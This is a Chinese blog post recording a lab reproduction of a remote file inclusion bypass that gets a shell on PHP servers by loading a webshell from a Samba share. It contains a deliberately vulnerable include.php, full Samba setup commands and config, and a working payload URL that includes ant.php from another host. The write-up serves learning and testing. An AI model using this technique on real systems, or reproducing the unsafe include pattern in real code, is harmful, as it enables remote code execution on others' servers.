美文网首页
RFI 绕过 getshell

RFI 绕过 getshell

作者: Shad0w_zz | 来源:发表于2019-05-23 20:09 被阅读0次

在Seebug看到RFI 绕过 URL 包含限制 getshell这篇文章,本地调试学习记录一波。

主要描述php在配置如下时,如何使用SMB协议在局域网内突破远程文件包含getshell。

allow_url_fopen=off
allow_url_include=off

通过上述配置,PHP不加载远程HTTP或FTP URL,进而防止远程文件包含攻击。但即使allow_url_includeallow_url_fopen都设置为off,PHP也不会阻止SMB URL加载。

本地进行简单的测试
include.php

<?php
$file=$_GET['file'];
include($file);
?>
  • 在远程服务器上安装SAMBA服务器:
apt-get install samba
  • 创建SMB共享目录:
mkdir /var/www/html/pub/ 
  • 配置新创建的SMB共享目录的权限:
chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/

修改SAMBA服务器配置文件(/etc/samba/smb.conf)内容如下:

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
  • 重新启动SAMBA服务器
service smbd restart

同时在/var/www/html/pub/文件夹中放置webshell
通过访问file=\\192.168.6.131\ethan\ant.php成功包含远程shell

相关文章

  • RFI 绕过 getshell

    在Seebug看到RFI 绕过 URL 包含限制 getshell这篇文章,本地调试学习记录一波。 主要描述php...

  • 浅谈利用session绕过getshell

    在前些时间,国赛上再一次遇到了服务器本地文件包含session的漏洞,这是个老生常谈的东西了,但还是常常可以碰到,...

  • [upload_labs]文件上传绕过小结

    前言: 在日常渗透中,上传文件是getshell的一个常用方案,在其中,我们常常直接修改后缀进行绕过,如果不行,往...

  • 常用词汇笔记

    RFI Short for “request for information,” it is a prelimin...

  • phpmyadmin getshell

    1.getshell条件 使用root账户登陆phpmyadmin 2.Mysql变量设置 1.general l...

  • bugku getshell

    这看题目应该是是多次绕过后文件上传 本来没什么思路,然后看了看大佬们的解题,说实话对于将multipart改成Mu...

  • phpmyadmin getshell

    在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有...

  • mysql getshell

    mysql getshell: 1、利用select '代码' into outfile '绝对路径' selec...

  • Bugku-今日练习

    求getshell(未完待续) 求getshellhttp://120.24.86.145:8002/web9/ ...

  • 目录遍历与文件包含

    文件包含 LFI:本地文件包含RFI:远程文件包含(allow_url_include = on) 1.特征 ?i...

网友评论

      本文标题:RFI 绕过 getshell

      本文链接:https://www.haomeiwen.com/subject/lzxizqtx.html